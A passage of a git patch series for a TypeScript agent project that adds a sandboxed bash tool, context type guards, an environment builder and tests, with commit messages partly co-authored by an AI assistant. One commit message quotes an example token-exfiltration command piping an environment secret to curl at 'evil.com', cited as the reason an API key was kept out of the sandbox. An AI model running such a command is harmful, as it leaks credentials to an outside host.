+ */ +export async function updateChat( + filter: UpdateChatFilter, + updates: ChatMutableFields, +): Promise { + // Split the optional `where` map into nullable vs equality predicates so we + // can apply each as a single chained call (`.match()` for equalities, + // `.is(col, null)` per nullable). Iterating with `let query = ...` and + // reassigning in a for-loop confuses Supabase's deeply generic builder + // types ("type instantiation is excessively deep") in the Next.js build. + const entries = Object.entries(filter.where ?? {}); + const equalityMatches: Record = {}; + const nullColumns: string[] = []; + for (const [column, value] of entries) { + if (value === null) { + nullColumns.push(column); + } else { + equalityMatches[column] = value; + } + } + + const baseQuery = supabase + .from("chats") + .update(updates) + .eq("id", filter.id) + .match(equalityMatches); + const finalQuery = nullColumns.reduce( + (q, column) => q.is(column, null) as typeof baseQuery, + baseQuery, + ); + + const { data, error } = await finalQuery.select(); + if (error) { + console.error("[updateChat] error:", error); + return { ok: false, error: error.message }; + } + + return { + ok: true, + rowsUpdated: data?.length ?? 0, + row: data?.[0] ?? null, + }; +} From dcddcbffabe284f8c9b577ecefc7961174e16a49 Mon Sep 17 00:00:00 2001 From: "sweetman.eth" Date: Thu, 21 May 2026 13:12:07 -0500 Subject: [PATCH 03/10] feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim) Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it through the workflow via streamText's `experimental_context`. Proves the entire tool-execution machinery works end-to-end. 
The remaining 10 tools (read, write, grep, glob, todo, task, ask_user_question, skill, fetch + utils) port in a follow-up; this PR's scope was deliberately held to one tool so the wire-up is reviewable in isolation. New files: - lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard, getSandbox() that reconnects via connectVercel(state) per call. - lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN, RECOUP_ORG_ID } env builder from context. - lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts adapted to api's Sandbox interface. Injects recoup env on foreground execs only (detached processes outlive the prompt → no token). - lib/agent/buildAgentTools.ts — factory returning the agent's tool record. Adding the remaining tools is a one-line append to this map. Wire-up: - runAgentStep now accepts `agentContext`, passes into streamText as experimental_context, and uses streamText's internal multi-step loop (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop in runAgentWorkflow needed. - handleChatWorkflowStream derives recoupOrgId from session.clone_url via extractOrgId, builds AgentContext with session.sandbox_state + validated.authToken, passes to start(workflow). Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory + 3 workflow file updates picked up by existing tests). Full suite 2978/2978 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure Sweetman KISS/SRP feedback (4 comments): - Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's default stop condition handles tool-call iteration without an arbitrary cap that could silently truncate the only workflow turn. - Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from bashTool. All model-issued commands are trusted in this PR — host- side gating belongs at the route/UI layer if it ever returns. 
- Removed `needsApproval` from bashTool entirely (subsumes cubic P1 about the broken override ordering — the gate itself is gone). - Split `lib/agent/tools/utils.ts` into per-function files: - `AgentContext.ts` — type - `isAgentContext.ts` — guard - `getSandbox.ts` — sandbox reconnection No catch-all utils file. Cubic feedback: - **P0**: Removed `recoupAccessToken` from AgentContext + handler + buildRecoupExecEnv. Handing the long-lived api key to bash would let any model-issued command exfiltrate it via env (`echo $TOKEN | curl evil.com`). Slim PR 4 has no actual consumer for the token — only the future `skill` tool needs it. Proper short-lived token minting will land alongside that port. - **P2** (`isAgentContext` too weak): tightened the guard to validate sandbox.state is a non-null object AND sandbox.workingDirectory is a non-empty string. Earlier guard returned true for `{ sandbox: {} }`, letting tools later crash on undefined fields. - P1 + P2 about stopWhen / needsApproval: resolved by sweetman's deletions above. - P2 (test file >100 lines): dismissed — same as PR 3 review. The repo has no enforced max-lines rule; existing tests routinely exceed 700 lines. Tests updated for the new shape. 25 tests in touched files green (8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv + 2 factory). Full suite 2980/2980 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow Per discussion on PR #583. Restoring the streamText stop condition so the workflow agent gets the model wrap-up turn after a tool call (model → tool → tool-result → model → text response), instead of stopping at streamText's default `stepCountIs(1)` after the first tool call. DRY by sharing one constant between the two chat endpoints: - New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts. 
Inherits the value that /api/chat already uses (originally hardcoded in getGeneralAgent.ts:55) — high enough that normal flows never hit the cap but bounds runaway loops for cost / replay safety. - lib/agents/generalAgent/getGeneralAgent.ts: imports the constant instead of constructing stepCountIs(111) inline. - app/lib/workflows/runAgentStep.ts: imports the constant, passes to streamText as `stopWhen`. Single-shot agents (createCompactAgent, createContentPromptAgent, createEmailReplyAgent) intentionally keep their local `stepCountIs(1)` — they're not in the multi-step chat family. Full suite 2980/2980 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) --------- Co-authored-by: Claude Opus 4.7 (1M context) --- app/lib/workflows/runAgentStep.ts | 34 ++-- app/lib/workflows/runAgentWorkflow.ts | 32 ++-- lib/agent/__tests__/buildAgentTools.test.ts | 17 ++ lib/agent/buildAgentTools.ts | 20 +++ lib/agent/tools/AgentContext.ts | 34 ++++ lib/agent/tools/__tests__/bashTool.test.ts | 158 ++++++++++++++++++ .../__tests__/buildRecoupExecEnv.test.ts | 31 ++++ lib/agent/tools/__tests__/getSandbox.test.ts | 39 +++++ .../tools/__tests__/isAgentContext.test.ts | 42 +++++ lib/agent/tools/bashTool.ts | 116 +++++++++++++ lib/agent/tools/buildRecoupExecEnv.ts | 30 ++++ lib/agent/tools/getSandbox.ts | 28 ++++ lib/agent/tools/isAgentContext.ts | 26 +++ lib/agents/generalAgent/getGeneralAgent.ts | 5 +- lib/chat/const.ts | 13 ++ lib/chat/handleChatWorkflowStream.ts | 20 +++ 16 files changed, 615 insertions(+), 30 deletions(-) create mode 100644 lib/agent/__tests__/buildAgentTools.test.ts create mode 100644 lib/agent/buildAgentTools.ts create mode 100644 lib/agent/tools/AgentContext.ts create mode 100644 lib/agent/tools/__tests__/bashTool.test.ts create mode 100644 lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts create mode 100644 lib/agent/tools/__tests__/getSandbox.test.ts create mode 100644 lib/agent/tools/__tests__/isAgentContext.test.ts 
create mode 100644 lib/agent/tools/bashTool.ts create mode 100644 lib/agent/tools/buildRecoupExecEnv.ts create mode 100644 lib/agent/tools/getSandbox.ts create mode 100644 lib/agent/tools/isAgentContext.ts diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts index 352dcd265..f9a894195 100644 --- a/app/lib/workflows/runAgentStep.ts +++ b/app/lib/workflows/runAgentStep.ts @@ -1,27 +1,36 @@ import { streamText, convertToModelMessages, type UIMessage, type UIMessageChunk } from "ai"; import { gateway } from "@ai-sdk/gateway"; import { agentCustomInstructions } from "@/lib/chat/agentCustomInstructions"; +import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const"; +import { buildAgentTools } from "@/lib/agent/buildAgentTools"; +import type { AgentContext } from "@/lib/agent/tools/AgentContext"; export type RunAgentStepInput = { messages: UIMessage[]; modelId: string; writable: WritableStream; + /** + * Threaded into `streamText`'s `experimental_context` so each tool's + * `execute` callback can read the sandbox state + per-prompt context. + */ + agentContext: AgentContext; }; /** - * One LLM turn in the chat workflow agent loop. Runs as a Vercel Workflow - * `"use step"` so that: + * One LLM turn (with internal tool-call iteration) in the chat workflow. + * Runs as a Vercel Workflow `"use step"` so: * * - Sandbox-banned APIs (`fetch`, `setTimeout`, `crypto`) are legal inside. * - The result is cached as a single durable event — replays after a crash - * do not re-bill the model. + * do not re-bill the model or re-execute tools. * - * Currently emits a plain text response with no tools. Sandbox tools land in - * the follow-up PR (port `@open-harness/agent` tools + wire via - * `experimental_context`). + * `streamText` drives the tool-call → tool-result → next-LLM-call loop + * internally, bounded by `CHAT_AGENT_STOP_WHEN` (passed as `stopWhen`). 
Our outer workflow stays + * single-turn for now — multi-turn message threading lands when the rest + * of the tool surface ports in a follow-up PR. * - * @param input - Messages + selected model + the workflow's writable stream. - * @returns finishReason from the model run (for the workflow loop's break condition). + * @param input - Messages + selected model + writable stream + agent context. + * @returns finishReason from the model run. */ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishReason: string }> { "use step"; @@ -29,17 +38,22 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe console.log("[runAgentStep] start", { modelId: input.modelId, messageCount: input.messages.length, + hasSandboxState: Boolean(input.agentContext.sandbox?.state), }); const modelMessages = convertToModelMessages(input.messages); + const tools = buildAgentTools(); const result = streamText({ model: gateway(input.modelId), system: agentCustomInstructions, messages: modelMessages, + tools, + stopWhen: CHAT_AGENT_STOP_WHEN, + experimental_context: input.agentContext, }); - // Acquire the writer once and release in `finally` — re-acquiring per chunk - // (the previous shape) leaked the lock when any write threw. + // Acquire the writer once and release in `finally` so a thrown chunk + // doesn't leak the lock. 
const writer = input.writable.getWriter(); try { for await (const part of result.toUIMessageStream()) { diff --git a/app/lib/workflows/runAgentWorkflow.ts b/app/lib/workflows/runAgentWorkflow.ts index db679145a..ce65b0bb3 100644 --- a/app/lib/workflows/runAgentWorkflow.ts +++ b/app/lib/workflows/runAgentWorkflow.ts @@ -1,12 +1,18 @@ import { getWritable } from "workflow"; import type { UIMessage, UIMessageChunk } from "ai"; import { runAgentStep } from "@/app/lib/workflows/runAgentStep"; +import type { AgentContext } from "@/lib/agent/tools/AgentContext"; export type RunAgentWorkflowInput = { messages: UIMessage[]; chatId: string; sessionId: string; modelId: string; + /** + * Threaded into `streamText`'s `experimental_context` so tools (bash et al.) + * can read sandbox state + the optional Recoup org id. + */ + agentContext: AgentContext; }; /** @@ -15,18 +21,14 @@ export type RunAgentWorkflowInput = { * client; this function writes UIMessage chunks into the workflow's writable * via `runAgentStep`. * - * Currently runs a SINGLE `runAgentStep` turn. A multi-turn agent loop is - * unsafe today: each iteration would re-send the original prompt without - * the assistant's tool-call response in scope, so a `tool-calls` finish - * reason would loop forever on the same input. The proper multi-turn - * shape (where the step appends its response to `messages` before the - * next iteration) lands with the sandbox-tool port in PR 4. - * - * Until then, if the model returns `tool-calls` we log a warning and exit - * — the client receives the partial tool-call chunks but no follow-up turn. + * Currently runs a SINGLE `runAgentStep` turn. Tool-call iteration (bounded by + * `CHAT_AGENT_STOP_WHEN`) happens INSIDE `streamText` via `stopWhen` — so the + * single workflow turn covers the full "user → assistant → tool → tool + * result → assistant" cycle without our outer loop having to thread + * messages between iterations. 
* * WDK constraints honored: - * - All I/O (streamText, fetches) lives in `"use step"` functions. + * - All I/O (streamText, sandbox.exec, fetches) lives in `"use step"` functions. * - The workflow body only orchestrates — no fetch / setTimeout / fs / crypto. */ export async function runAgentWorkflow(input: RunAgentWorkflowInput): Promise { @@ -43,14 +45,8 @@ export async function runAgentWorkflow(input: RunAgentWorkflowInput): Promise { + it("returns a tools record keyed by tool name", () => { + const tools = buildAgentTools(); + expect(tools).toHaveProperty("bash"); + expect(typeof tools.bash).toBe("object"); + }); + + it("each tool has an inputSchema, description, and execute", () => { + const tools = buildAgentTools(); + expect(tools.bash.inputSchema).toBeDefined(); + expect(tools.bash.description).toBeDefined(); + expect(typeof tools.bash.execute).toBe("function"); + }); +}); diff --git a/lib/agent/buildAgentTools.ts b/lib/agent/buildAgentTools.ts new file mode 100644 index 000000000..be6bde085 --- /dev/null +++ b/lib/agent/buildAgentTools.ts @@ -0,0 +1,20 @@ +import { bashTool } from "@/lib/agent/tools/bashTool"; + +/** + * Factory for the full agent tool set passed into `streamText({ tools })`. + * Each tool reads its sandbox handle + Recoup org id from `experimental_context` + * at execute time — the factory takes no arguments because the tools are + * stateless modulo that context. + * + * Slim PR 4 exposes only `bash`. The remaining sandbox tools (`read`, + * `write`, `grep`, `glob`, `todo`, `task`, `ask_user_question`, `skill`, + * `fetch`) port in follow-up PRs and slot into this record one-by-one + * without changing the factory signature. 
+ */ +export function buildAgentTools() { + return { + bash: bashTool(), + }; +} + +export type AgentTools = ReturnType; diff --git a/lib/agent/tools/AgentContext.ts b/lib/agent/tools/AgentContext.ts new file mode 100644 index 000000000..63d2a1b7e --- /dev/null +++ b/lib/agent/tools/AgentContext.ts @@ -0,0 +1,34 @@ +import type { VercelState } from "@/lib/sandbox/vercel/state"; + +/** + * Per-tool-call context threaded into the agent via `streamText`'s + * `experimental_context`. Mirrors the open-agents `AgentContext` shape + * (subset — slim PR 4 ports only the `bash` tool, so context only needs + * what `bash` reads). + * + * Why no `recoupAccessToken` field? A short-lived per-prompt credential + * would let sandbox tools (`skill`, the eventual `recoup-api` skill) call + * back to recoup-api as the caller. We deliberately omit it here — the + * legacy api-key path is too long-lived to expose inside a sandbox where + * model-issued bash commands can read env. Proper short-lived token + * minting lands alongside the `skill` tool port. + */ +export type AgentContext = { + /** + * Persistable sandbox state. Tools reconnect via `connectVercel(state)` — + * we never pass a live `Sandbox` instance through context because + * workflow durability requires replay-friendly inputs. + */ + sandbox: { + state: VercelState; + workingDirectory: string; + currentBranch?: string; + }; + /** + * Organization UUID when the sandbox was opened against a recoupable + * org repo (`org--`). Forwarded to sandboxed commands as + * `RECOUP_ORG_ID` so future `recoup-api` skill calls scope to that org. + * Public information — no security risk in exposing. 
+ */ + recoupOrgId?: string; +}; diff --git a/lib/agent/tools/__tests__/bashTool.test.ts b/lib/agent/tools/__tests__/bashTool.test.ts new file mode 100644 index 000000000..da9a999d3 --- /dev/null +++ b/lib/agent/tools/__tests__/bashTool.test.ts @@ -0,0 +1,158 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { bashTool } from "@/lib/agent/tools/bashTool"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +const baseContext = { + sandbox: { state: { sandboxName: "session-x" }, workingDirectory: "/sandbox/mono" }, +}; + +function makeSandbox(overrides: Record = {}) { + return { + workingDirectory: "/sandbox/mono", + exec: vi.fn(), + execDetached: vi.fn(), + ...overrides, + }; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("bashTool.execute", () => { + it("executes a command via sandbox.exec in the sandbox's working directory", async () => { + const sandbox = makeSandbox({ + exec: vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "README.md\npackage.json", + stderr: "", + truncated: false, + }), + }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = bashTool(); + const result = await tool.execute!({ command: "ls" }, { + experimental_context: baseContext, + } as never); + expect(result).toEqual({ + success: true, + exitCode: 0, + stdout: "README.md\npackage.json", + stderr: "", + }); + expect(sandbox.exec).toHaveBeenCalledWith( + "ls", + "/sandbox/mono", + expect.any(Number), + expect.any(Object), + ); + }); + + it("includes `truncated: true` in the result when sandbox.exec truncated output", async () => { + const sandbox = makeSandbox({ + exec: vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "lots of output", + stderr: "", + truncated: true, + }), + }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = 
bashTool(); + const result = (await tool.execute!({ command: "find ." }, { + experimental_context: baseContext, + } as never)) as { truncated?: boolean }; + expect(result.truncated).toBe(true); + }); + + it("resolves a workspace-relative cwd against sandbox.workingDirectory", async () => { + const sandbox = makeSandbox({ + exec: vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "", + stderr: "", + truncated: false, + }), + }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = bashTool(); + await tool.execute!({ command: "ls", cwd: "apps/web" }, { + experimental_context: baseContext, + } as never); + expect(sandbox.exec).toHaveBeenCalledWith( + "ls", + "/sandbox/mono/apps/web", + expect.any(Number), + expect.any(Object), + ); + }); + + it("injects RECOUP_ORG_ID into the exec env when present in context", async () => { + const sandbox = makeSandbox({ + exec: vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "", + stderr: "", + truncated: false, + }), + }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = bashTool(); + await tool.execute!({ command: "curl example.com" }, { + experimental_context: { ...baseContext, recoupOrgId: "org-uuid" }, + } as never); + const opts = sandbox.exec.mock.calls[0]?.[3] as { env?: Record }; + expect(opts.env).toEqual({ RECOUP_ORG_ID: "org-uuid" }); + }); + + it("returns the detached commandId when called with detached:true", async () => { + const sandbox = makeSandbox({ + execDetached: vi.fn().mockResolvedValue({ commandId: "cmd-123" }), + }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = bashTool(); + const result = (await tool.execute!({ command: "npm run dev", detached: true }, { + experimental_context: baseContext, + } as never)) as { success: boolean; stdout: string }; + expect(result.success).toBe(true); + expect(result.stdout).toMatch(/cmd-123/); + 
expect(sandbox.execDetached).toHaveBeenCalledWith("npm run dev", "/sandbox/mono"); + }); + + it("returns success:false with a descriptive stderr when the sandbox lacks execDetached", async () => { + const sandbox = makeSandbox({ execDetached: undefined }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = bashTool(); + const result = (await tool.execute!({ command: "npm run dev", detached: true }, { + experimental_context: baseContext, + } as never)) as { success: boolean; stderr: string }; + expect(result.success).toBe(false); + expect(result.stderr).toMatch(/detached mode is not supported/i); + }); + + it("does NOT inject env vars on detached execs", async () => { + const sandbox = makeSandbox({ + execDetached: vi.fn().mockResolvedValue({ commandId: "cmd-1" }), + }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = bashTool(); + await tool.execute!({ command: "npm run dev", detached: true }, { + experimental_context: { ...baseContext, recoupOrgId: "org-uuid" }, + } as never); + // execDetached signature is (command, cwd) — no env arg. 
+ expect(sandbox.execDetached.mock.calls[0]).toHaveLength(2); + }); +}); diff --git a/lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts b/lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts new file mode 100644 index 000000000..3422fd662 --- /dev/null +++ b/lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts @@ -0,0 +1,31 @@ +import { describe, it, expect } from "vitest"; +import { buildRecoupExecEnv } from "@/lib/agent/tools/buildRecoupExecEnv"; + +const baseSandbox = { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" }; + +describe("buildRecoupExecEnv", () => { + it("returns undefined when no context", () => { + expect(buildRecoupExecEnv(undefined)).toBeUndefined(); + expect(buildRecoupExecEnv(null)).toBeUndefined(); + expect(buildRecoupExecEnv("not-a-context")).toBeUndefined(); + }); + + it("returns undefined when context has no recoupOrgId", () => { + expect(buildRecoupExecEnv({ sandbox: baseSandbox })).toBeUndefined(); + }); + + it("injects RECOUP_ORG_ID when present in context", () => { + const env = buildRecoupExecEnv({ sandbox: baseSandbox, recoupOrgId: "org-uuid" }); + expect(env).toEqual({ RECOUP_ORG_ID: "org-uuid" }); + }); + + it("ignores empty-string recoupOrgId", () => { + const env = buildRecoupExecEnv({ sandbox: baseSandbox, recoupOrgId: "" }); + expect(env).toBeUndefined(); + }); + + it("returns undefined when the input is not a valid AgentContext shape", () => { + expect(buildRecoupExecEnv({ recoupOrgId: "org-uuid" })).toBeUndefined(); + expect(buildRecoupExecEnv({ sandbox: null, recoupOrgId: "org-uuid" })).toBeUndefined(); + }); +}); diff --git a/lib/agent/tools/__tests__/getSandbox.test.ts b/lib/agent/tools/__tests__/getSandbox.test.ts new file mode 100644 index 000000000..a14122f81 --- /dev/null +++ b/lib/agent/tools/__tests__/getSandbox.test.ts @@ -0,0 +1,39 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; +import { connectVercel } from 
"@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +beforeEach(() => vi.clearAllMocks()); + +describe("getSandbox", () => { + it("reconnects via connectVercel(state) and returns the sandbox", async () => { + const fakeSandbox = { workingDirectory: "/sandbox/mono" }; + vi.mocked(connectVercel).mockResolvedValue(fakeSandbox as never); + const state = { sandboxName: "session-xyz" }; + const result = await getSandbox( + { sandbox: { state, workingDirectory: "/sandbox/mono" } }, + "bash", + ); + expect(result).toBe(fakeSandbox); + expect(connectVercel).toHaveBeenCalledWith(state); + }); + + it("throws a descriptive error when context is missing entirely", async () => { + await expect(getSandbox(undefined, "bash")).rejects.toThrow(/Sandbox state missing/); + }); + + it("throws when sandbox.state is missing", async () => { + await expect( + getSandbox({ sandbox: { workingDirectory: "/x" } } as never, "bash"), + ).rejects.toThrow(/Sandbox state missing/); + }); + + it("throws when sandbox.workingDirectory is empty (tightened guard)", async () => { + await expect( + getSandbox({ sandbox: { state: {}, workingDirectory: "" } } as never, "bash"), + ).rejects.toThrow(/Sandbox state missing/); + }); +}); diff --git a/lib/agent/tools/__tests__/isAgentContext.test.ts b/lib/agent/tools/__tests__/isAgentContext.test.ts new file mode 100644 index 000000000..29ad4f29d --- /dev/null +++ b/lib/agent/tools/__tests__/isAgentContext.test.ts @@ -0,0 +1,42 @@ +import { describe, it, expect } from "vitest"; +import { isAgentContext } from "@/lib/agent/tools/isAgentContext"; + +describe("isAgentContext", () => { + it("returns true for a well-formed context", () => { + expect( + isAgentContext({ + sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" }, + }), + ).toBe(true); + }); + + it("returns false for non-object inputs", () => { + expect(isAgentContext(undefined)).toBe(false); 
+ expect(isAgentContext(null)).toBe(false); + expect(isAgentContext("nope")).toBe(false); + expect(isAgentContext(42)).toBe(false); + }); + + it("returns false when sandbox is missing", () => { + expect(isAgentContext({})).toBe(false); + }); + + it("returns false when sandbox is null", () => { + expect(isAgentContext({ sandbox: null })).toBe(false); + }); + + it("returns false when sandbox is empty (missing state and workingDirectory)", () => { + expect(isAgentContext({ sandbox: {} })).toBe(false); + }); + + it("returns false when sandbox.state is missing or null", () => { + expect(isAgentContext({ sandbox: { workingDirectory: "/x" } })).toBe(false); + expect(isAgentContext({ sandbox: { state: null, workingDirectory: "/x" } })).toBe(false); + }); + + it("returns false when sandbox.workingDirectory is missing, non-string, or empty", () => { + expect(isAgentContext({ sandbox: { state: {} } })).toBe(false); + expect(isAgentContext({ sandbox: { state: {}, workingDirectory: 42 } })).toBe(false); + expect(isAgentContext({ sandbox: { state: {}, workingDirectory: "" } })).toBe(false); + }); +}); diff --git a/lib/agent/tools/bashTool.ts b/lib/agent/tools/bashTool.ts new file mode 100644 index 000000000..908113812 --- /dev/null +++ b/lib/agent/tools/bashTool.ts @@ -0,0 +1,116 @@ +import { tool } from "ai"; +import { z } from "zod"; +import * as path from "path"; +import { buildRecoupExecEnv } from "@/lib/agent/tools/buildRecoupExecEnv"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; + +const TIMEOUT_MS = 120_000; + +const bashInputSchema = z.object({ + command: z.string().describe("The bash command to execute"), + cwd: z + .string() + .optional() + .describe("Workspace-relative working directory for the command (e.g., apps/web)"), + detached: z + .boolean() + .optional() + .describe( + "Use this whenever you want to run a persistent server in the background (e.g., npm run dev, next dev). 
The command starts and returns immediately without waiting for it to finish.", + ), +}); + +/** + * Factory for the `bash` sandbox tool. Runs `bash -c ""` inside + * the agent's sandbox via `sandbox.exec`, defaulting cwd to the sandbox's + * working directory. + * + * Approval gating is intentionally absent — model-issued commands are + * trusted in this PR. Add a host-side gate at the route/UI layer if that + * changes. + * + * Foreground execs receive `RECOUP_ORG_ID` from agent context (when the + * sandbox is org-scoped) so future `recoup-api` skill calls can scope to + * the right org. Detached execs deliberately skip env injection — those + * processes outlive the prompt. + */ +export const bashTool = () => + tool({ + description: `Execute a bash command in the user's shell (non-interactive). + +WHEN TO USE: +- Running existing project commands (build, test, lint, typecheck) +- Using read-only CLI tools (git status, git diff, ls, etc.) +- Invoking language/package managers (npm, pnpm, yarn, pip, go, etc.) as part of the task + +WHEN NOT TO USE: +- Reading files (use the file read tool instead, once available) +- Editing or creating files (use file edit/write tools, once available) +- Searching code or text (use grep / glob tools, once available) +- Interactive commands (shells, editors, REPLs) + +USAGE: +- Runs bash -c "" in a non-interactive shell (no TTY/PTY) +- Commands run in the sandbox working directory by default — do NOT prepend "cd /path &&" +- Use the cwd parameter ONLY with a workspace-relative subdirectory +- Commands automatically timeout after ~2 minutes +- Combined stdout/stderr output is truncated after ~50,000 characters + +IMPORTANT: +- Never chain commands with ';' or '&&' — use separate tool calls +- Never use interactive commands (vim, nano, top, bash, ssh, etc.) 
+- Always quote file paths that may contain spaces +- Use detached: true to start dev servers / long-running processes in the background`, + inputSchema: bashInputSchema, + execute: async ({ command, cwd, detached }, { experimental_context, abortSignal }) => { + const sandbox = await getSandbox(experimental_context, "bash"); + const workingDirectory = sandbox.workingDirectory; + const workingDir = cwd + ? path.isAbsolute(cwd) + ? cwd + : path.resolve(workingDirectory, cwd) + : workingDirectory; + + if (detached) { + if (!sandbox.execDetached) { + return { + success: false, + exitCode: null, + stdout: "", + stderr: + "Detached mode is not supported in this sandbox environment. Only cloud sandboxes support background processes.", + }; + } + try { + const { commandId } = await sandbox.execDetached(command, workingDir); + return { + success: true, + exitCode: null, + stdout: `Process started in background (command ID: ${commandId}). The server is now running.`, + stderr: "", + }; + } catch (error) { + return { + success: false, + exitCode: null, + stdout: "", + stderr: error instanceof Error ? error.message : String(error), + }; + } + } + + const recoupEnv = buildRecoupExecEnv(experimental_context); + const result = await sandbox.exec(command, workingDir, TIMEOUT_MS, { + signal: abortSignal, + ...(recoupEnv ? 
{ env: recoupEnv } : {}), + }); + + return { + success: result.success, + exitCode: result.exitCode, + stdout: result.stdout, + stderr: result.stderr, + ...(result.truncated && { truncated: true }), + }; + }, + }); diff --git a/lib/agent/tools/buildRecoupExecEnv.ts b/lib/agent/tools/buildRecoupExecEnv.ts new file mode 100644 index 000000000..6eaf3015f --- /dev/null +++ b/lib/agent/tools/buildRecoupExecEnv.ts @@ -0,0 +1,30 @@ +import { isAgentContext } from "@/lib/agent/tools/isAgentContext"; + +/** + * Build a per-invocation env override carrying Recoupable sandbox context + * so outbound shell commands (curl, scripts, the `recoup-api` skill) can + * scope requests correctly without any state persisting on the sandbox. + * + * Currently injects only `RECOUP_ORG_ID` — a public identifier. Auth-token + * injection is deliberately NOT included here; a long-lived api key in the + * sandbox env would be readable by any model-issued bash command. Proper + * short-lived token minting will land alongside the `skill` tool port + * (when there's an actual consumer for it). + * + * Returns `undefined` when nothing is available to inject so callers can + * cleanly spread a conditional `...(env ? { env } : {})` into exec opts. + * + * @param experimental_context - The opaque context object passed by AI SDK to tool execute. + */ +export function buildRecoupExecEnv( + experimental_context: unknown, +): Record | undefined { + if (!isAgentContext(experimental_context)) return undefined; + + const env: Record = {}; + if (experimental_context.recoupOrgId) { + env.RECOUP_ORG_ID = experimental_context.recoupOrgId; + } + + return Object.keys(env).length > 0 ? 
env : undefined; +} diff --git a/lib/agent/tools/getSandbox.ts b/lib/agent/tools/getSandbox.ts new file mode 100644 index 000000000..be6c46605 --- /dev/null +++ b/lib/agent/tools/getSandbox.ts @@ -0,0 +1,28 @@ +import type { Sandbox } from "@/lib/sandbox/interface"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; +import { isAgentContext } from "@/lib/agent/tools/isAgentContext"; + +/** + * Resolve a connected `Sandbox` instance from `experimental_context`. + * Reconnects each call via `connectVercel(state)` rather than caching the + * handle on context — workflow durability requires that side-effecting + * resources (sandbox sessions) be re-acquired inside the step that uses + * them, not passed across event boundaries. + * + * @param experimental_context - The opaque context object passed by AI SDK to tool execute. + * @param toolName - Optional tool name to surface in error messages. + */ +export async function getSandbox( + experimental_context: unknown, + toolName?: string, +): Promise { + if (!isAgentContext(experimental_context)) { + const where = toolName ? ` (tool: ${toolName})` : ""; + throw new Error( + `Sandbox state missing from agent context${where}. ` + + "Ensure the workflow start payload includes `sandbox.state` and that " + + "runAgentStep threads it via experimental_context.", + ); + } + return connectVercel(experimental_context.sandbox.state); +} diff --git a/lib/agent/tools/isAgentContext.ts b/lib/agent/tools/isAgentContext.ts new file mode 100644 index 000000000..0049ac010 --- /dev/null +++ b/lib/agent/tools/isAgentContext.ts @@ -0,0 +1,26 @@ +import type { AgentContext } from "@/lib/agent/tools/AgentContext"; + +/** + * Type-guard that confirms an arbitrary `experimental_context` shape has + * the AgentContext fields tools rely on at runtime. 
Validates each required + * leaf (sandbox object, state object, non-empty workingDirectory) so callers + * can trust the narrowed type — earlier weaker guards returned true for + * `{ sandbox: null }` or `{ sandbox: {} }`, letting tools later crash on + * "cannot read .x of undefined". + * + * @param value - The opaque context object passed by AI SDK to tool execute. + */ +export function isAgentContext(value: unknown): value is AgentContext { + if (typeof value !== "object" || value === null) return false; + + const candidate = value as { sandbox?: unknown }; + const sandbox = candidate.sandbox; + if (typeof sandbox !== "object" || sandbox === null) return false; + + const sandboxFields = sandbox as { state?: unknown; workingDirectory?: unknown }; + if (typeof sandboxFields.state !== "object" || sandboxFields.state === null) return false; + if (typeof sandboxFields.workingDirectory !== "string") return false; + if (sandboxFields.workingDirectory.length === 0) return false; + + return true; +} diff --git a/lib/agents/generalAgent/getGeneralAgent.ts b/lib/agents/generalAgent/getGeneralAgent.ts index 7c2c9407b..e4bc4fc56 100644 --- 